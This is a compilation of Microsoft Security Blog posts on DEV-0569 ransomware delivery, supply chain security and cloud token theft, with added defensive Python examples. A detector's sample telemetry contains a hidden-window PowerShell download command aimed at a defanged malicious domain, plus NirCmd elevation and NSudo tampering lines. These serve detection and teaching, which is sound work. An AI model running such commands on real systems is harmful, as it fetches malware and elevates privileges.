If successful, the command allows the attacker to elevate from local admin to SYSTEM rights, similar to executing a scheduled task as SYSTEM.

The PowerShell script also delivered additional executables from a remote website (e.g., updateea1[.]com), including an AES-encrypted Gozi banking trojan and the information stealer known as Vidar Stealer, which used Telegram to receive command and control (C2) information. DEV-0569 frequently diversifies their payloads and has shifted away from ZLoader, which it delivered at the beginning of 2022, possibly in response to disruption efforts against ZLoader in April 2022.
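The NirCmd elevation command, the NSudo launches and the downloader script above are concrete things to look for in process-creation telemetry. The following Python is an added example, not code from the post or from Microsoft: it runs three simple rules (NirCmd's elevatecmd verb, any NSudo execution, and hidden-window PowerShell that fetches content) over constructed process events whose field names are an assumption rather than any product's schema, and reports hosts on which more than one rule fires, since the combination is far less noisy than any single rule.

```python
"""Detect the DEV-0569 host activity described above in process-creation
events. Added example, not from the post; the event schema and all sample
records are constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent: str      # parent image name
    image: str       # new process image name
    cmdline: str     # full command line


# Rules evaluated against the command line. The rule names are this
# example's own.
CMDLINE_RULES = {
    # NirCmd's elevatecmd verb launches the named program elevated; the
    # post shows it used to run requestadmin.bat.
    "nircmd_elevatecmd": re.compile(r"\bnircmd(\.exe)?\b.*\belevatecmd\b", re.I),
    # Hidden-window PowerShell that pulls content from the network, the
    # downloader behaviour attributed to the BATLOADER-launched script.
    "powershell_hidden_download": re.compile(
        r"-w(indowstyle)?\s+hidden.*\b(iwr|invoke-webrequest|downloadstring|"
        r"downloadfile|start-bitstransfer)\b",
        re.I,
    ),
}
# Rule evaluated against the image name: any NSudo execution, the same
# scope as the "Nsudo runtime" detection listed in the post.
NSUDO_IMAGE = re.compile(r"(^|\\)nsudo\.exe$", re.I)


def evaluate(event: ProcessEvent) -> list:
    """Return the names of every rule the event matches."""
    hits = []
    if NSUDO_IMAGE.search(event.image):
        hits.append("nsudo_runtime")
    for name, rx in CMDLINE_RULES.items():
        if rx.search(event.cmdline):
            hits.append(name)
    return hits


def scan(events) -> list:
    """(host, image, rule) for every rule hit, in event order."""
    return [(e.host, e.image, rule) for e in events for rule in evaluate(e)]


def chained_hosts(findings, min_rules: int = 2) -> list:
    """Hosts on which at least min_rules distinct rules fired: one elevation
    or one download is noisy on its own, the combination is not."""
    seen = {}
    for host, _image, rule in findings:
        seen.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in seen.items() if len(rules) >= min_rules)


# Constructed sample telemetry (not real logs). ws01 reproduces the chain
# from the post; ws02 shows benign uses of the same tools.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "msiexec.exe", "powershell.exe",
                 'powershell.exe -w hidden -ep bypass -c "iwr https://updateea1[.]com/u -OutFile u.exe"'),
    ProcessEvent("ws01", "powershell.exe", "nircmd.exe",
                 'nircmd elevatecmd exec hide "requestadmin.bat"'),
    ProcessEvent("ws01", "cmd.exe", "NSudo.exe",
                 'NSudo.exe "C:\\Users\\Public\\tamper.bat"'),
    ProcessEvent("ws02", "explorer.exe", "nircmd.exe",
                 'nircmd.exe setdefaultsounddevice "Speakers"'),
    ProcessEvent("ws02", "explorer.exe", "powershell.exe",
                 "powershell.exe -c Get-Service"),
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for host, image, rule in hits:
        print(f"{host}: {image} -> {rule}")
    print("hosts with a chained pattern:", chained_hosts(hits))
```

The benign ws02 events show why the rules key on the elevatecmd verb and on hidden-window downloads rather than on the tool names alone: NirCmd and PowerShell are common on workstations, NSudo much less so, which is why the NSudo rule is deliberately broad.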

September 2022: Deploying Royal ransomware

Microsoft identified instances involving DEV-0569 infection chains that ultimately facilitated human-operated ransomware attacks distributing Royal ransomware. Based on tactics observed by Microsoft, ransomware attackers likely gained access to compromised networks via a BATLOADER-delivered Cobalt Strike Beacon implant.

DEV-0569’s widespread infection base and diverse payloads likely make the group an attractive access broker for ransomware operators.

October 2022: Leveraging Google Ads to deliver BATLOADER selectively

In late October 2022, Microsoft researchers identified a DEV-0569 malvertising campaign leveraging Google Ads that point to the legitimate traffic distribution system (TDS) Keitaro, which provides capabilities to customize advertising campaigns via tracking ad traffic and user- or device-based filtering. Microsoft observed that the TDS redirects the user to a legitimate download site, or under certain conditions, to the malicious BATLOADER download site. Microsoft reported this abuse to Google for awareness and consideration for action.

Using Keitaro’s traffic filtering, DEV-0569 can deliver their payloads to specified IP ranges and targets. This filtering can also help DEV-0569 avoid IP ranges of known security sandboxing solutions.

Defending against DEV-0569

DEV-0569 will likely continue to rely on malvertising and phishing to deliver malware payloads. Solutions such as network protection and Microsoft Defender SmartScreen can help thwart malicious link access. Microsoft Defender for Office 365 helps guard against phishing by inspecting the email body and URL for known patterns. Since DEV-0569’s phishing scheme abuses legitimate services, organizations can also leverage mail flow rules to capture suspicious keywords or review broad exceptions, such as those related to IP ranges and domain-level allow lists. Enabling Safe Links for emails, Microsoft Teams, and Office Apps can also help address this threat.

Defenders can also apply the following mitigations to reduce the impact of this threat:

  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Turn on network protection to block connections to malicious domains and IP addresses.
  • Build organizational resilience against email threats by educating users about identifying social engineering attacks and preventing malware infection. Use Attack simulation training in Microsoft Defender for Office 365 to run attack scenarios, increase user awareness, and empower employees to recognize and report these attacks.
  • Practice the principle of least-privilege and maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Turn on tamper protection features to prevent attackers from stopping security services.

Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

NSudo activity is detected by the tamper protection capability as:

  • Nsudo file drop
  • Nsudo runtime
  • Nsudo AV tampering commandline

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Ransomware-linked DEV-0569 activity group

While the following alerts might indicate activity associated with this threat, they could also be triggered by unrelated threat activity:

  • Ransomware-linked DEV-0858 activity group
  • Cobalt Strike activity detected
  • Cobalt Strike activity observed
  • Cobalt Strike artifact observed
  • Cobalt Strike attack tool
  • Cobalt strike named pipes
  • ‘Vidar’ credential theft malware was detected
  • ‘VidarStealer’ malware was detected
  • ‘Gozi’ malware was detected
  • An active ‘Nsudo’ hacktool in a command line was detected while executing
  • An active ‘NSudo’ hacktool process was detected while executing

The post DEV-0569 finds new ways to deliver Royal ransomware, various payloads appeared first on Microsoft Security Blog.

Announcing the Microsoft Machine Learning Membership Inference Competition (MICO)

November 16th, 2022

We’re excited to announce the launch of a new competition focusing on the security and privacy of machine learning (ML) systems. Machine learning has already become a key enabler in many products and services, and this trend is likely to continue. It is therefore critical to understand the security and privacy guarantees provided by state-of-the-art …


Microsoft contributes S2C2F to OpenSSF to improve supply chain security

November 16th, 2022

On August 4, 2022, Microsoft publicly shared a framework that it has been using to secure its own development practices since 2019, the Secure Supply Chain Consumption Framework (S2C2F), previously the Open Source Software-Supply Chain Security (OSS-SSC) Framework. As a massive consumer of and contributor to open source, Microsoft understands the importance of a robust strategy around securing how developers consume and manage open source software (OSS) dependencies when building software. We are pleased to announce that the S2C2F has been adopted by the OpenSSF under the Supply Chain Integrity Working Group and formed into its own Special Initiative Group (SIG). Our peers at the OpenSSF and across the globe agree with Microsoft when it comes to how fundamental this work is to improving supply chain security for everyone.

What is the S2C2F?

We built the S2C2F as a consumption-focused framework that uses a threat-based, risk-reduction approach to mitigate real-world threats. One of its primary strengths is how well it pairs with any producer-focused framework, such as SLSA.[1] The framework enumerates a list of real-world supply chain threats specific to OSS and explains how the framework’s requirements mitigate those threats. It also includes a high-level platform- and software-agnostic set of focuses that are divided into eight different areas of practice:

Sunburst chart conveying the eight areas of practice requirements to address the threats and reduce risk: ingest, inventory, update, enforce, audit, scan, rebuild, and fix and upstream.

Each of the eight practices comprises requirements that address the threats and reduce risk. The requirements are organized into four levels of maturity. We have seen massive success with both internal and external projects that have adopted this framework. Using the S2C2F, teams and organizations can more efficiently prioritize their efforts in accordance with the maturity model. The ability to target a specific level of compliance within the framework means teams can make intentional and incremental progress toward reducing their supply chain risk.

Each maturity level has a theme represented in Levels (1 to 4). Level 1 represents the previous conventional wisdom of inventorying your OSS, scanning for known vulnerabilities, and then updating OSS dependencies, which is the minimum necessary for an OSS governance program. Level 2 builds upon Level 1 by leveraging technology that helps improve your mean time to remediate (MTTR) vulnerabilities in OSS with the goal of patching faster than the adversary can operate. Level 3 is focused on proactive security analysis combined with preventative controls that mitigate against accidental consumption of compromised or malicious OSS. Level 4 represents controls that mitigate against the most sophisticated attacks but are also the controls that are the most difficult to implement at scale—therefore, these should be considered aspirational and reserved for your dependencies in your most critical projects.

The S2C2F has four levels of maturity. Level 1: running a minimum OSS governance program. Level 2: improving MTTR vulnerabilities. Level 3: adding defenses from compromised OSS. Level 4: mitigating against the most sophisticated adversaries.

The S2C2F includes a guide to assess your organization’s maturity, and an implementation guide that recommends tools from across the industry to help meet the framework requirements. For example, both GitHub Advanced Security (GHAS) and GHAS on Azure DevOps (ADO) already provide a suite of security tools that will help teams and organizations achieve S2C2F Level 2 compliance.
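To make the maturity levels concrete, here is a minimal implementation of the Level 1 practices (inventory pinned OSS, scan it against an advisory feed, report what needs updating) together with one preventative control of the kind Level 3 calls for: refusing a package whose bytes do not match the digest recorded when it was pinned. This is an added example, not S2C2F or OpenSSF tooling, and the hash check is my illustration of a Level 3 control, not a quoted S2C2F requirement. The lockfile format mirrors pip’s hash-pinned requirements; the package names, package bytes and advisory records are all constructed.

```python
"""Inventory, scan and enforce steps over a hash-pinned lockfile. Added
example, not S2C2F or OpenSSF tooling; all packages, bytes and advisories
below are constructed."""
import hashlib
import hmac
import re

# Constructed "downloaded" artifacts: the bytes a build would fetch.
CLEAN_ARTIFACTS = {
    "examplelib": b"examplelib-1.4.2 constructed wheel contents",
    "parsekit": b"parsekit-0.9.0 constructed wheel contents",
}
# Same package name and version, but content that differs from what was
# pinned: the compromised-package case a Level 3 control guards against.
TAMPERED_ARTIFACT = b"parsekit-0.9.0 constructed wheel contents + injected code"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Lockfile generated from the clean artifacts, so every entry carries the
# digest of the bytes that were reviewed when the pin was created.
LOCKFILE = "\n".join(
    f"{name}=={ver} --hash=sha256:{sha256_hex(CLEAN_ARTIFACTS[name])}"
    for name, ver in (("examplelib", "1.4.2"), ("parsekit", "0.9.0"))
)

# Constructed advisory feed (not real vulnerability data); each entry
# covers the half-open version range [introduced, fixed).
ADVISORIES = [
    {"id": "ADV-CONSTRUCTED-0001", "package": "parsekit",
     "introduced": "0.1.0", "fixed": "0.9.3"},
    {"id": "ADV-CONSTRUCTED-0002", "package": "examplelib",
     "introduced": "2.0.0", "fixed": "2.0.4"},
]

REQ_LINE = re.compile(r"^([A-Za-z0-9_.-]+)==(\S+)\s+--hash=sha256:([0-9a-f]{64})$")


def parse_lockfile(text: str) -> dict:
    """Inventory step: name -> (version, sha256). Rejects anything that is
    not pinned to an exact version with a digest."""
    inventory = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = REQ_LINE.match(line)
        if m is None:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        name, version, digest = m.groups()
        inventory[name.lower()] = (version, digest)
    return inventory


def version_key(v: str) -> tuple:
    """Numeric dotted versions only, which is enough for this example."""
    return tuple(int(part) for part in v.split("."))


def scan(inventory: dict, advisories: list) -> list:
    """Scan step: (package, pinned version, advisory id, fixed version) for
    every pinned version that falls inside an advisory's affected range."""
    findings = []
    for adv in advisories:
        pinned = inventory.get(adv["package"])
        if pinned is None:
            continue
        v = version_key(pinned[0])
        if version_key(adv["introduced"]) <= v < version_key(adv["fixed"]):
            findings.append((adv["package"], pinned[0], adv["id"], adv["fixed"]))
    return findings


def verify_artifact(name: str, data: bytes, inventory: dict) -> bool:
    """Enforce step: accept the bytes only if they hash to the pinned digest.
    compare_digest keeps the comparison constant-time."""
    expected = inventory[name][1]
    return hmac.compare_digest(sha256_hex(data), expected)


if __name__ == "__main__":
    inv = parse_lockfile(LOCKFILE)
    for pkg, ver, adv_id, fixed in scan(inv, ADVISORIES):
        print(f"update {pkg} {ver} -> {fixed} ({adv_id})")
    print("clean parsekit accepted:",
          verify_artifact("parsekit", CLEAN_ARTIFACTS["parsekit"], inv))
    print("tampered parsekit accepted:",
          verify_artifact("parsekit", TAMPERED_ARTIFACT, inv))
```

The scan reports parsekit 0.9.0 as needing the update to 0.9.3 while examplelib 1.4.2 is outside its advisory’s range, and the tampered artifact is rejected even though its name and version match the pin; real tooling replaces the constructed feed with a vulnerability database and the constructed bytes with the fetched package.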

The S2C2F is critical to the future of supply chain security

According to Sonatype’s 2022 State of the Software Supply Chain report,[2] supply chain attacks specifically targeting OSS have increased by 742 percent annually over the past three years. The S2C2F is designed from the ground up to protect developers from accidentally consuming malicious and compromised packages, helping to mitigate supply chain attacks by decreasing consumption-based attack surfaces. As new threats emerge, the OpenSSF S2C2F SIG under the Supply Chain Integrity Working Group, led by a team from Microsoft, is committed to reviewing and maintaining the set of S2C2F requirements to address them.

Learn more

View the S2C2F requirements or download the guide now to see how you can improve the security of your OSS consumption practices in your team or organization. Come join the S2C2F community discussion within the OpenSSF Supply Chain Integrity Working Group.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

[1] Supply chain Levels for Software Artifacts (SLSA).

[2] 8th Annual State of the Software Supply Chain Report, Sonatype.

The post Microsoft contributes S2C2F to OpenSSF to improve supply chain security appeared first on Microsoft Security Blog.

Token tactics: How to prevent, detect, and respond to cloud token theft

November 16th, 2022

As organizations increase their coverage of multifactor authentication (MFA), threat actors have begun to move to more sophisticated techniques to allow them to compromise corporate resources without needing to satisfy MFA. Recently, the Microsoft Detection and Response Team (DART) has seen an increase in attackers utilizing token theft for this purpose. By compromising and replaying a token issued to an identity that has already completed multifactor authentication, the threat actor satisfies the validation of MFA and access is granted to organizational resources accordingly. This is a concerning tactic for defenders because the expertise needed to compromise a token is very low, the technique is hard to detect, and few organizations have token theft mitigations in their incident response plan.

Why it matters

In the new world of hybrid work, users may be accessing corporate resources from personally owned or unmanaged devices, which increases the risk of token theft occurring. These unmanaged devices likely have weaker security controls than those that are managed by organizations, and most importantly, are not visible to corporate IT. Users on these devices may be signed into both personal websites and corporate applications at the same time, allowing attackers to compromise tokens belonging to both.

As far as mitigations go, publicly available open-source tools for exploiting token theft already exist, and commodity credential theft malware has already been adapted to include this technique in their arsenal. Detecting token theft can be difficult without the proper safeguards and visibility into authentication endpoints. Microsoft DART aims to provide defenders with the knowledge and strategies necessary to mitigate this tactic until permanent solutions become available.

Tokens are at the center of OAuth 2.0 identity platforms, such as Azure Active Directory (Azure AD). To access a resource (for example, a web application protected by Azure AD), a user must present a valid token. To obtain that token, the user must sign into Azure AD using their credentials. At that point, depending on policy, they may be required to complete MFA. The user then presents that token to the web application, which validates the token and allows the user access.

Flowchart for Azure Active Directory issuing tokens.
Figure 1. OAuth Token flow chart

When Azure AD issues a token, it contains information (claims) such as the username, source IP address, MFA, and more. It also includes any privilege a user has in Azure AD. If you sign in as a Global Administrator to your Azure AD tenant, then the token will reflect that. Two of the most common token theft techniques DART has observed have been through adversary-in-the-middle (AitM) frameworks or the utilization of commodity malware (which enables a ‘pass-the-cookie’ scenario).

With traditional credential phishing, the attacker may use the credentials they have compromised to try and sign in to Azure AD. If the security policy requires MFA, the attacker is halted from being able to successfully sign in. Though the user’s credentials were compromised in this attack, the threat actor is prevented from accessing organizational resources.

Flowchart describing how credential phishing attacks are mitigated by multifactor authentication.
Figure 2. Common credential phishing attack mitigated by MFA

Adversary-in-the-middle (AitM) phishing attack

Attacker methodologies are always evolving, and to that end DART has seen an increase in attackers using AitM techniques to steal tokens instead of passwords. Frameworks like Evilginx2 go far beyond credential phishing, by inserting malicious infrastructure between the user and the legitimate application the user is trying to access. When the user is phished, the malicious infrastructure captures both the credentials of the user, and the token.

Flowchart describing how an adversary in the middle attack works.
Figure 3. Adversary-in-the-middle (AitM) attack flowchart

If a regular user is phished and their token stolen, the attacker may attempt business email compromise (BEC) for financial gain. If a token with Global Administrator privilege is stolen, then they may attempt to take over the Azure AD tenant entirely, resulting in loss of administrative control and total tenant compromise.

Pass-the-cookie attack

A “pass-the-cookie” attack is a type of attack where an attacker can bypass authentication controls by compromising browser cookies. At a high level, browser cookies allow web applications to store user authentication information. This allows a website to keep you signed in and not constantly prompt for credentials every time you click a new page.

“Pass-the-cookie” is like pass-the-hash or pass-the-ticket attacks in Active Directory. After authentication to Azure AD via a browser, a cookie is created and stored for that session. If an attacker can compromise a device and extract the browser cookies, they could pass that cookie into a separate web browser on another system, bypassing security checkpoints along the way. Users who are accessing corporate resources on personal devices are especially at risk. Personal devices often have weaker security controls than corporate-managed devices and IT staff lack visibility to those devices to determine compromise. They also have additional attack vectors, such as personal email addresses or social media accounts users may access on the same device. Attackers can compromise these systems and steal the authentication cookies associated with both personal accounts and the users’ corporate credentials.

Flowchart describing how pass-the-cookie attack works
Figure 4. Pass-the-cookie attack flowchart

Commodity credential theft malware like Emotet, Redline, IcedID, and more all have built-in functionality to extract and exfiltrate browser cookies. Additionally, the attacker does not have to know the compromised account password or even the email address for this to work; those details are held within the cookie.



Organizations can take a significant step toward reducing the risk of token theft by ensuring that they have full visibility of where and how their users are authenticating. To access critical applications like Exchange Online or SharePoint, the device used should be known by the organization. Utilizing compliance tools like Intune in combination with device-based conditional access policies can help to keep devices up to date with patches, antivirus definitions, and EDR solutions. Allowing only known devices that adhere to Microsoft’s recommended security baselines helps mitigate the risk of commodity credential theft malware being able to compromise end user devices.

For those devices that remain unmanaged, consider utilizing session conditional access policies and other compensating controls to reduce the impact of token theft:

Protect your users by blocking initial access:

  • Plan and implement phishing resistant MFA solutions such as FIDO2 security keys, Windows Hello for Business, or certificate-based authentication for users.
    • While this may not be practical for all users, it should be considered for users of significant privilege like Global Admins or users of high-risk applications.
  • Users that hold a high level of privilege in the tenant should have a segregated cloud-only identity for all administrative activities, to reduce the attack surface from on-premises to cloud in the event of on-premises domain compromise and abuse of privilege. These identities should also not have a mailbox attached to them to prevent the likelihood of privileged account compromise via phishing techniques.

We recognize that while it may be recommended for organizations to enforce location, device compliance, and session lifetime controls for all applications, it may not always be practical. Decision-makers should instead focus on deploying these controls to the applications and users that pose the greatest risk to the organization, which may include:

  • Highly privileged users like Global Administrators, Service Administrators, Authentication Administrators, and Billing Administrators among others.
  • Finance and treasury type applications that are attractive targets for attackers seeking financial gain.
  • Human capital management (HCM) applications containing personally identifiable information that may be targeted for exfiltration.
  • Control and management plane access to Microsoft 365 Defender, Azure, Office 365 and other cloud app administrative portals.
  • Access to Office 365 services (Exchange, SharePoint, and Teams) and productivity-based cloud apps.
  • VPN or remote access portals that provide external access to organizational resources.


When a token is replayed, the sign-in from the threat actor can flag anomalous features and impossible travel alerts. Azure Active Directory Identity Protection and Microsoft Defender for Cloud Apps both alert on these events. Azure AD Identity Protection has a specific detection for anomalous token events. The token anomaly detection in Azure AD Identity Protection is tuned to incur more noise than other alerts. This helps ensure that genuine token theft events aren’t missed.

DART recommends focusing on high severity alerts and on those users who trigger multiple alerts rapidly. Detection rules that map to the MITRE ATT&CK framework can help detect genuine compromise, for example a risky sign-in followed closely by indicators of persistence techniques, such as mailbox rule creation.

Response and investigation

If a user is confirmed compromised and their token stolen, DART recommends several steps to evict the threat actor. Azure AD provides the capability to revoke a refresh token. Once a refresh token is revoked, it’s no longer valid. When the associated access token expires, the user will be prompted to re-authenticate. The following graphic outlines the methods by which access is terminated entirely:

Chart showing refresh revocation by type
Figure 5. Refresh token revocation by type

It’s crucial to revoke refresh tokens through the Azure AD portal, Microsoft Graph, or Azure AD PowerShell in addition to resetting the user’s password to complete the revocation process.

Importantly, revoking refresh tokens via the above methods doesn’t invalidate the access token immediately, which can still be valid for up to an hour. This means the threat actor may still have access to a compromised user’s account until the access token expires. Azure AD now supports continuous access evaluation for Exchange, SharePoint and Teams, allowing access tokens to be revoked in near real time following a ‘critical event’. This helps to significantly reduce the up to one hour delay between refresh token revocation and access token expiry.
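The claims described earlier and the revocation gap described here can be seen on a token itself. The following Python is an added example, not Microsoft code: it reads the claims of a token, works out how long a replayed copy stays usable after the refresh token is revoked, and compares the `ipaddr` claim with the address a request actually arrived from. The token is constructed and signed with a throwaway HS256 key so the example runs offline; Azure AD access tokens are signed by the service with RS256, but the claim names used here (`iat`, `exp`, `amr`, `ipaddr`, `upn`) follow the Azure AD token format, and the tenant id in the issuer is a placeholder.

```python
"""Inspect access-token claims and compute the post-revocation exposure
window. Added example, not Microsoft code; the key, token and claim
values are constructed."""
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(claims: dict, key: bytes) -> str:
    """Build a compact JWS (header.payload.signature) for the sample."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [b64url_encode(json.dumps(part, separators=(",", ":")).encode())
                for part in (header, claims)]
    signing_input = ".".join(segments)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_signature(token: str, key: bytes) -> bool:
    head, payload, sig = token.split(".")
    expected = hmac.new(key, f"{head}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def peek_claims(token: str) -> dict:
    """Decode the payload WITHOUT checking the signature. Suitable for
    triaging a token you already hold during an investigation, never for
    an authorization decision."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    return json.loads(b64url_decode(parts[1]))


def seconds_of_exposure(claims: dict, revoked_at: int) -> int:
    """Seconds an access token remains usable once its refresh token is
    revoked at revoked_at: revocation does not shorten the access token,
    which lives until exp."""
    return max(0, claims["exp"] - revoked_at)


def replay_indicators(claims: dict, seen_from_ip: str, seen_at: int) -> list:
    """Signals that a presented token is being replayed rather than used
    from the session it was issued to."""
    flags = []
    if claims.get("ipaddr") and claims["ipaddr"] != seen_from_ip:
        flags.append(f"ipaddr mismatch: issued to {claims['ipaddr']}, "
                     f"presented from {seen_from_ip}")
    if seen_at >= claims["exp"]:
        flags.append("presented after exp")
    return flags


# Constructed sample: issued at a fixed timestamp with a one-hour lifetime,
# after an MFA-satisfied sign-in (amr contains "mfa").
ISSUED_AT = 1_700_000_000
SAMPLE_KEY = b"throwaway-demo-key"
SAMPLE_CLAIMS = {
    "aud": "https://graph.microsoft.com",
    "iss": "https://sts.windows.net/<tenant-id-placeholder>/",
    "iat": ISSUED_AT, "nbf": ISSUED_AT, "exp": ISSUED_AT + 3600,
    "amr": ["pwd", "mfa"],
    "ipaddr": "203.0.113.10",
    "upn": "user@example.com",
}
SAMPLE_TOKEN = make_token(SAMPLE_CLAIMS, SAMPLE_KEY)

if __name__ == "__main__":
    claims = peek_claims(SAMPLE_TOKEN)
    revoked_at = ISSUED_AT + 900      # refresh token revoked 15 minutes in
    print("replayed token still valid for",
          seconds_of_exposure(claims, revoked_at), "seconds")
    print(replay_indicators(claims, "198.51.100.7", ISSUED_AT + 1200))
```

With the refresh token revoked fifteen minutes after issuance, the access token is still good for 2700 seconds, which is the window continuous access evaluation closes for the services that support it; the `ipaddr` mismatch is the kind of signal the anomalous-token detections act on.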

Microsoft DART also recommends checking the compromised user’s account for other signs of persistence. These can include:

  • Mailbox rules – threat actors often create specific mailbox rules to forward or hide email. These can include rules to hide emails in folders that are not often used. For example, a threat actor may forward all emails containing the keyword ‘invoice’ to the Archive folder to hide them from the user or forward them to an external email address.
  • Mailbox forwarding – email forwarding may be configured to send a copy of all email to an external email address. This allows the threat actor to silently retrieve a copy of every email the user receives.
  • Multifactor authentication modification – DART has detected instances of threat actors registering additional authentication methods against compromised accounts for use with MFA, such as phone numbers or authenticator apps.
  • Device enrollment – in some cases, DART has seen threat actors add a device to an Azure AD tenant they control. This is an attempt to bypass conditional access rules with exclusions such as known devices.
  • Data exfiltration – threat actors may use the inbuilt sharing functionality in SharePoint and OneDrive to share important or sensitive documents and organizational resources externally.

To strengthen your security posture, you should configure alerts to review high-risk modifications to a tenant. Some examples of this are:

  • Modification or creation of security configurations
  • Modification or creation of Exchange transport rules
  • Modification or creation of privileged users or roles

Incident responders should review any audit logs related to user activity to look for signs of persistence. Logs available in the Unified Audit Log, Microsoft Defender for Cloud Apps, or SIEM solutions like Microsoft Sentinel can aid with investigations.
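The detection rule suggested earlier (a risky sign-in followed closely by persistence activity) and the persistence checklist above can be combined into one correlation over audit records. The following Python is an added example, not DART’s tooling: it takes constructed audit records, maps operations to the persistence categories from the list (inbox rules, mailbox forwarding, MFA method registration, external sharing) and reports every risky sign-in that was followed by one of them for the same user within a window. The Exchange and SharePoint operation names follow the Unified Audit Log (`New-InboxRule`, `Set-Mailbox`, `AnonymousLinkCreated`) and the Azure AD audit activity `User registered security info`; the `RiskySignIn` record and the flat field layout are this example’s own simplification.

```python
"""Correlate risky sign-ins with follow-on persistence actions by the same
user. Added example, not DART tooling; all records are constructed."""
from datetime import datetime, timedelta

# Constructed audit records: (timestamp, user, operation, parameters).
T0 = datetime(2022, 11, 1, 9, 0, 0)
RECORDS = [
    (T0, "alice@example.com", "RiskySignIn", {"ip": "198.51.100.7", "risk": "high"}),
    (T0 + timedelta(minutes=2), "alice@example.com", "UserLoggedIn", {"ip": "198.51.100.7"}),
    (T0 + timedelta(minutes=5), "alice@example.com", "New-InboxRule",
     {"Name": ".", "SubjectContainsWords": "invoice", "MoveToFolder": "Archive"}),
    (T0 + timedelta(minutes=10), "alice@example.com", "Set-Mailbox",
     {"ForwardingSmtpAddress": "smtp:collector@external.example.net"}),
    (T0 + timedelta(hours=3), "alice@example.com", "AnonymousLinkCreated",
     {"ObjectId": "https://tenant-placeholder.sharepoint.com/sites/finance/q4.xlsx"}),
    # bob has no risky sign-in, so his routine changes must not be reported.
    (T0 + timedelta(minutes=1), "bob@example.com", "Set-Mailbox", {"DisplayName": "Bob"}),
    (T0 + timedelta(minutes=3), "bob@example.com", "New-InboxRule",
     {"Name": "Newsletters", "MoveToFolder": "Reading"}),
]

HIDE_OR_FORWARD = ("MoveToFolder", "DeleteMessage", "ForwardTo",
                   "ForwardAsAttachmentTo", "RedirectTo")


def classify_persistence(operation: str, params: dict):
    """Map an audit operation to one of the persistence categories from the
    post, or None when the operation is not of interest here."""
    if operation == "New-InboxRule":
        if any(k in params for k in HIDE_OR_FORWARD):
            return "mailbox rule that hides or forwards mail"
        return "mailbox rule"
    if operation == "Set-Mailbox" and any(
            k in params for k in ("ForwardingSmtpAddress", "ForwardingAddress")):
        return "mailbox forwarding"
    if operation == "User registered security info":
        return "MFA method registration"
    if operation == "AnonymousLinkCreated":
        return "external sharing link"
    return None


def correlate(records, window: timedelta = timedelta(hours=1)) -> list:
    """For each risky sign-in, collect persistence actions by the same user
    within `window` after it. Returns [(user, risky_at, [(at, op, label)])]
    and keeps only sign-ins that were followed by at least one such action."""
    ordered = sorted(records, key=lambda r: r[0])
    incidents = []
    for at, user, op, _params in ordered:
        if op != "RiskySignIn":
            continue
        followups = []
        for later_at, later_user, later_op, later_params in ordered:
            if later_user != user or not (at <= later_at <= at + window):
                continue
            label = classify_persistence(later_op, later_params)
            if label:
                followups.append((later_at, later_op, label))
        if followups:
            incidents.append((user, at, followups))
    return incidents


if __name__ == "__main__":
    for user, risky_at, followups in correlate(RECORDS):
        print(f"{user}: risky sign-in at {risky_at:%H:%M}")
        for at, op, label in followups:
            print(f"  {at:%H:%M} {op}: {label}")
```

The one-hour default window catches the inbox rule and the forwarding change but not the sharing link three hours later; widening the window trades the extra coverage for more benign matches, which is the usual tuning decision for this kind of rule.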


Although tactics from threat actors are constantly evolving, it is important to note that multifactor authentication, when combined with other basic security hygiene—utilizing antimalware, applying least privilege principles, keeping software up to date and protecting data—still protects against 98% of all attacks.

Fundamentally, it is important to consider the identity trust chain for the organization, spanning both internally and externally. The trust chain includes all systems (such as identity providers, federated identity providers, MFA services, VPN solutions, cloud-service providers, and enterprise applications) that issue access tokens and grant privilege for identities both cloud and on-premises, resulting in implicit trust between them.

In instances of token theft, adversaries insert themselves in the middle of the trust chain and often subsequently circumvent security controls. Having visibility, alerting, insights, and a full understanding of where security controls are enforced is key. Treating both identity providers that generate access tokens and their associated privileged identities as critical assets is strongly encouraged.

Adversaries have and will continue to find ways to evade security controls. The tactics utilized by threat actors to bypass controls and compromise tokens present additional challenges to defenders. However, by implementing the controls presented in this blog DART believes that organizations will be better prepared to detect, mitigate, and respond to threats of this nature moving forward.

The post Token tactics: How to prevent, detect, and respond to cloud token theft appeared first on Microsoft Security Blog.

2022 holiday DDoS protection guide

November 15th, 2022

The holiday season is an exciting time for many people as they get to relax, connect with friends and family, and celebrate traditions. Organizations also have much to rejoice about during the holidays (for example, more sales for retailers and more players for gaming companies). Unfortunately, cyber attackers also look forward to this time of year to celebrate an emerging holiday tradition—distributed denial-of-service (DDoS) attacks.

